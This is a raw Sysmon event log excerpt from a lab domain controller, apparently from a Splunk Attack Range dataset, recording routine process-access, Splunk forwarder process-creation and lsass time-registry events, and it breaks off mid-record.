13:34:18.829{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.829{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-485A-6000-5705-000000009A01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.829{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-485A-6000-5705-000000009A01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.830{08A6967A-485A-6000-5705-000000009A01}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.313{08A6967A-485A-6000-5605-000000009A01}69161204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-485A-6000-5605-000000009A01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-485A-6000-5605-000000009A01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.157{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-485A-6000-5605-000000009A01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:18.158{08A6967A-485A-6000-5605-000000009A01}6916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-485C-6000-5805-000000009A01}6956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-485C-6000-5805-000000009A01}6956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.063{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-485C-6000-5805-000000009A01}6956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:20.064{08A6967A-485C-6000-5805-000000009A01}6956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000013528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000013527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00176726) 13241300x800000000000000013526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea71-0xa9013c51) 13241300x800000000000000013525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea7a-0x0ac5a451) 13241300x800000000000000013524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea82-0x6c8a0c51) 13241300x800000000000000013523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000013522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00176726) 13241300x800000000000000013521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea71-0xa8e9518c) 13241300x800000000000000013520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea7a-0x0aadb98c) 13241300x800000000000000013519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:34:54.564{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea82-0x6c72218c) 10341000x800000000000000013552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.877{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.877{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:34:56.658{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 